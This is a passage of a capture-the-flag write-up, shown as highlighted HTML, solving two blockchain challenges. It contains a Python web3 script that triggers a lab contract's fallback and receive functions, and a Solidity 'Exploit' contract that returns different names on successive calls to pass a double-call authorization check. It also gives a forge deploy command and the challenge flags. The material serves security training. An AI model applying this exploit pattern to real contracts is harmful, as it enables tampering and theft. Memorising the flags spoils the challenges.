class="s2">&#34;First shot: </span><span class="si">{</span><span class="n">first_shot_status</span><span class="si">}</span><span class="s2">, Second shot: </span><span class="si">{</span><span class="n">second_shot_status</span><span class="si">}</span><span class="s2">, Third shot: </span><span class="si">{</span><span class="n">third_shot_status</span><span class="si">}</span><span class="s2">&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># First shot: Call the fallback function</span> </span></span><span class="line"><span class="cl"><span class="n">transaction</span> <span class="o">=</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;from&#39;</span><span class="p">:</span> <span class="n">my_account</span><span class="o">.</span><span class="n">address</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;to&#39;</span><span class="p">:</span> <span class="n">TARGET_CONTRACT_ADDRESS</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;value&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;gas&#39;</span><span class="p">:</span> <span class="mi">3000000</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;gasPrice&#39;</span><span class="p">:</span> <span class="n">w3</span><span class="o">.</span><span class="n">to_wei</span><span class="p">(</span><span class="s1">&#39;10&#39;</span><span class="p">,</span> <span class="s1">&#39;gwei&#39;</span><span class="p">),</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;nonce&#39;</span><span class="p">:</span> <span class="n">w3</span><span class="o">.</span><span class="n">eth</span><span class="o">.</span><span class="n">get_transaction_count</span><span class="p">(</span><span class="n">my_account</span><span class="o">.</span><span class="n">address</span><span class="p">),</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;data&#39;</span><span class="p">:</span> <span class="s1">&#39;0x&#39;</span> <span class="o">+</span> <span class="s1">&#39;00&#39;</span> <span class="o">*</span> <span class="mi">32</span><span class="p">,</span> <span class="c1"># Add 32 bytes of zero data to trigger the fallback function</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">signed_transaction</span> <span class="o">=</span> <span class="n">my_account</span><span class="o">.</span><span class="n">signTransaction</span><span class="p">(</span><span class="n">transaction</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">transaction_hash</span> <span class="o">=</span> <span class="n">w3</span><span class="o">.</span><span class="n">eth</span><span class="o">.</span><span class="n">send_raw_transaction</span><span class="p">(</span><span class="n">signed_transaction</span><span class="o">.</span><span class="n">rawTransaction</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">transaction_receipt</span> <span class="o">=</span> <span class="n">w3</span><span class="o">.</span><span class="n">eth</span><span class="o">.</span><span class="n">wait_for_transaction_receipt</span><span class="p">(</span><span class="n">transaction_hash</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">print_status</span><span class="p">()</span> </span></span><span class="line"><span class="cl"><span class="c1"># Trigger the receive function to hit the second target</span> </span></span><span class="line"><span class="cl"><span class="n">transaction</span><span class="p">[</span><span class="s1">&#39;value&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="n">w3</span><span class="o">.</span><span class="n">to_wei</span><span class="p">(</span><span class="s1">&#39;2&#39;</span><span class="p">,</span> <span class="s1">&#39;ether&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">transaction</span><span class="p">[</span><span class="s1">&#39;nonce&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="n">w3</span><span class="o">.</span><span class="n">eth</span><span class="o">.</span><span class="n">get_transaction_count</span><span class="p">(</span><span class="n">my_account</span><span class="o">.</span><span class="n">address</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">transaction</span><span class="p">[</span><span class="s1">&#39;data&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="s1">&#39;0x&#39;</span> <span class="c1"># Send an empty data field to trigger the receive function</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">signed_transaction</span> <span class="o">=</span> <span class="n">my_account</span><span class="o">.</span><span class="n">signTransaction</span><span class="p">(</span><span class="n">transaction</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">transaction_hash</span> <span class="o">=</span> <span class="n">w3</span><span class="o">.</span><span class="n">eth</span><span class="o">.</span><span class="n">send_raw_transaction</span><span class="p">(</span><span class="n">signed_transaction</span><span class="o">.</span><span class="n">rawTransaction</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">transaction_receipt</span> <span class="o">=</span> <span class="n">w3</span><span class="o">.</span><span class="n">eth</span><span class="o">.</span><span class="n">wait_for_transaction_receipt</span><span class="p">(</span><span class="n">transaction_hash</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">print_status</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># Trigger the third function to hit the third target</span> </span></span><span class="line"><span class="cl"><span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">3</span><span class="p">):</span> <span class="c1"># Increase the number of times we call the third() function</span> </span></span><span class="line"><span class="cl"> <span class="n">transaction</span> <span class="o">=</span> <span class="n">target_contract</span><span class="o">.</span><span class="n">functions</span><span class="o">.</span><span class="n">third</span><span class="p">()</span><span class="o">.</span><span class="n">build_transaction</span><span class="p">({</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;from&#39;</span><span class="p">:</span> <span class="n">my_account</span><span class="o">.</span><span class="n">address</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;gas&#39;</span><span class="p">:</span> <span class="mi">3000000</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;gasPrice&#39;</span><span class="p">:</span> <span class="n">w3</span><span class="o">.</span><span class="n">to_wei</span><span class="p">(</span><span class="s1">&#39;10&#39;</span><span class="p">,</span> <span class="s1">&#39;gwei&#39;</span><span class="p">),</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;nonce&#39;</span><span class="p">:</span> <span class="n">w3</span><span class="o">.</span><span class="n">eth</span><span class="o">.</span><span class="n">get_transaction_count</span><span class="p">(</span><span class="n">my_account</span><span class="o">.</span><span class="n">address</span><span class="p">),</span> </span></span><span class="line"><span class="cl"> <span class="p">})</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">signed_transaction</span> <span class="o">=</span> <span class="n">my_account</span><span class="o">.</span><span class="n">signTransaction</span><span class="p">(</span><span class="n">transaction</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">transaction_hash</span> <span class="o">=</span> <span class="n">w3</span><span class="o">.</span><span class="n">eth</span><span class="o">.</span><span class="n">send_raw_transaction</span><span class="p">(</span><span class="n">signed_transaction</span><span class="o">.</span><span class="n">rawTransaction</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">transaction_receipt</span> <span class="o">=</span> <span class="n">w3</span><span class="o">.</span><span class="n">eth</span><span class="o">.</span><span class="n">wait_for_transaction_receipt</span><span class="p">(</span><span class="n">transaction_hash</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">print_status</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># Check if the challenge is solved</span> </span></span><span class="line"><span class="cl"><span class="n">is_solved</span> <span class="o">=</span> <span class="n">setup_contract</span><span class="o">.</span><span class="n">functions</span><span class="o">.</span><span class="n">isSolved</span><span class="p">()</span><span class="o">.</span><span class="n">call</span><span class="p">()</span> </span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="s2">&#34;Challenge solved:&#34;</span><span class="p">,</span> <span class="n">is_solved</span><span class="p">)</span> </span></span></code></pre></div><p>Run the script and get the flag.</p> <img src="Solved2.png" alt="Solved" width="1000"/> <p>Flag is: <strong>HTB{f33l5_n1c3_h1771n6_y0ur_74r6375}</strong></p> <p><strong>Fun fact: The script used to solve this challenge was generated by ChatGPT.</strong></p> <h2 id="the-art-of-deception">The Art Of Deception</h2> <ul> <li> <p><strong>Given zip:</strong> <a href="https://drive.google.com/drive/folders/1372QkXFtk-wwnEQRMxV2wkysXJtazzcn?usp=share_link" target="_blank" rel="noopener">Get it here!</a></p> </li> <li> <p><strong>Description:</strong> Your cyborg abilities are not always the most effective tools for achieving your goals. Sometimes, you need to go unnoticed and blend in with your surroundings. To achieve this, you must learn to assume new identities and blend in with different groups of people. Mastering the art of deception requires subtlety, observation, and the ability to read people&rsquo;s motivations and intentions. After completing this training, you will emerge as a skilled infiltrator, capable of seamlessly blending in with your surroundings and achieving your objectives with stealth and subtlety. Can you bypass the High Security Gate and sneak into the Fortified Perimeter?</p> </li> <li> <p><strong>Note:</strong> This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.</p> </li> <li> <p><strong>Category:</strong> Blockchain</p> </li> <li> <p><strong>Difficulty:</strong> Easy</p> </li> </ul> <p>In this challenge, the objective is to trick the <code>HighSecurityGate</code> contract, making its lastEntrant equal to <code>Pandora</code>. The <code>Setup</code> contract imports and initializes the <code>HighSecurityGate</code> contract. The <code>isSolved()</code> function checks if the lastEntrant variable in the <code>HighSecurityGate</code> contract is equal to <code>Pandora</code>.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-solidity" data-lang="solidity"><span class="line"><span class="cl"> <span class="kd">function</span> <span class="nf">isSolved</span><span class="p">()</span> <span class="k">public</span> <span class="k">view</span> <span class="k">returns</span> <span class="p">(</span><span class="kt">bool</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">TARGET</span><span class="p">.</span><span class="n">strcmp</span><span class="p">(</span><span class="n">TARGET</span><span class="p">.</span><span class="n">lastEntrant</span><span class="p">(),</span> <span class="s">&#34;Pandora&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span></code></pre></div><p>The <code>HighSecurityGate</code> contract has an array of authorized names (Orion, Nova, and Eclipse), and the <code>enter()</code> function checks if the name returned by the Entrant interface implementation matches any of the authorized names. If it does, the lastEntrant variable is updated with the returned name.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-solidity" data-lang="solidity"><span class="line"><span class="cl"> <span class="kt">string</span><span class="p">[]</span> <span class="k">private</span> <span class="n">authorized</span> <span class="o">=</span> <span class="p">[</span><span class="s">&#34;Orion&#34;</span><span class="p">,</span> <span class="s">&#34;Nova&#34;</span><span class="p">,</span> <span class="s">&#34;Eclipse&#34;</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> <span class="kt">string</span> <span class="k">public</span> <span class="n">lastEntrant</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="kd">function</span> <span class="nf">enter</span><span class="p">()</span> <span class="k">external</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">Entrant</span> <span class="n">_entrant</span> <span class="o">=</span> <span class="n">Entrant</span><span class="p">(</span><span class="nb">msg</span><span class="p">.</span><span class="nb">sender</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="nb">require</span><span class="p">(</span><span class="n">_isAuthorized</span><span class="p">(</span><span class="n">_entrant</span><span class="p">.</span><span class="nb">name</span><span class="p">()),</span> <span class="s">&#34;Intruder detected&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">lastEntrant</span> <span class="o">=</span> <span class="n">_entrant</span><span class="p">.</span><span class="nb">name</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="kd">function</span> <span class="nf">_isAuthorized</span><span class="p">(</span><span class="kt">string</span> <span class="k">memory</span> <span class="n">_user</span><span class="p">)</span> <span class="k">private</span> <span class="k">view</span> <span class="k">returns</span> <span class="p">(</span><span class="kt">bool</span><span class="p">){</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="p">(</span><span class="kt">uint</span> <span class="n">i</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">authorized</span><span class="p">.</span><span class="n">length</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">){</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">_user</span><span class="p">,</span> <span class="n">authorized</span><span class="p">[</span><span class="n">i</span><span class="p">])){</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="kc">true</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="kc">false</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span></code></pre></div><p>To exploit this setup, an <code>Exploit</code> contract is created, implementing the Entrant interface with a <code>name()</code> function that returns an authorized name on the first call and <code>Pandora</code> on the second call. This contract also has a <code>pwn()</code> function that calls the <code>enter()</code> function of the <code>HighSecurityGate</code> contract, with the Exploit contract acting as the sender. This is the <code>Exploit</code> contract:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-solidity" data-lang="solidity"><span class="line"><span class="cl"><span class="k">pragma solidity</span> <span class="o">^</span><span class="mi">0</span><span class="p">.</span><span class="mi">8</span><span class="p">.</span><span class="mi">18</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="s">&#34;./Setup.sol&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="kd">interface</span> <span class="nc">Entrant</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kd">function</span> <span class="nf">name</span><span class="p">()</span> <span class="k">external</span> <span class="k">returns</span> <span class="p">(</span><span class="kt">string</span> <span class="k">memory</span><span class="p">);</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="kd">contract</span> <span class="nc">Exploit</span> <span class="k">is</span> <span class="n">Entrant</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">address</span> <span class="k">payable</span> <span class="k">public</span> <span class="n">targetAddr</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">Setup</span> <span class="n">targetContract</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="kt">bool</span> <span class="k">public</span> <span class="n">first</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="kd">constructor</span><span class="p">(</span><span class="kt">address</span> <span class="k">payable</span> <span class="n">_addr</span><span class="p">)</span> <span class="k">payable</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">targetAddr</span> <span class="o">=</span> <span class="k">payable</span><span class="p">(</span><span class="n">_addr</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">targetContract</span> <span class="o">=</span> <span class="n">Setup</span><span class="p">(</span><span class="n">targetAddr</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">first</span> <span class="o">=</span> <span class="kc">true</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="kd">function</span> <span class="nf">name</span><span class="p">()</span> <span class="k">external</span> <span class="k">returns</span> <span class="p">(</span><span class="kt">string</span> <span class="k">memory</span><span class="p">){</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">first</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">first</span> <span class="o">=</span> <span class="kc">false</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="s">&#34;Orion&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="s">&#34;Pandora&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="kd">function</span> <span class="nf">pwn</span><span class="p">()</span> <span class="k">public</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">targetContract</span><span class="p">.</span><span class="n">TARGET</span><span class="p">().</span><span class="n">enter</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></div><p>To deploy the <code>Exploit</code> contract, we used <code>foundry-rs</code> (you can find it here: <a href="https://github.com/foundry-rs/foundry" target="_blank" rel="noopener">https://github.com/foundry-rs/foundry</a>) :</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">forge create Exploit --rpc-url &lt;rpc_url&gt; --private-key &lt;private_key&gt; --constructor-args &lt;setup_contract_address&gt; --value 100ether </span></span></code></pre></div><p>After deploying the <code>Exploit</code> contract, call the <code>pwn()</code> function twice. On the first call, the <code>name()</code> function will return an authorized name, updating the <code>lastEntrant</code> variable in the <code>HighSecurityGate</code> contract. On the second call, the <code>name()</code> function will return <code>Pandora</code>, updating the <code>lastEntrant</code> variable to the desired value. When the <code>lastEntrant</code> variable set to <code>Pandora</code>, the <code>isSolved()</code> function in the <code>Setup</code> contract will return <code>true</code>, indicating that the challenge has been successfully solved.</p> <p>Flag is: <strong>HTB{H1D1n9_1n_PL41n_519H7}</strong></p>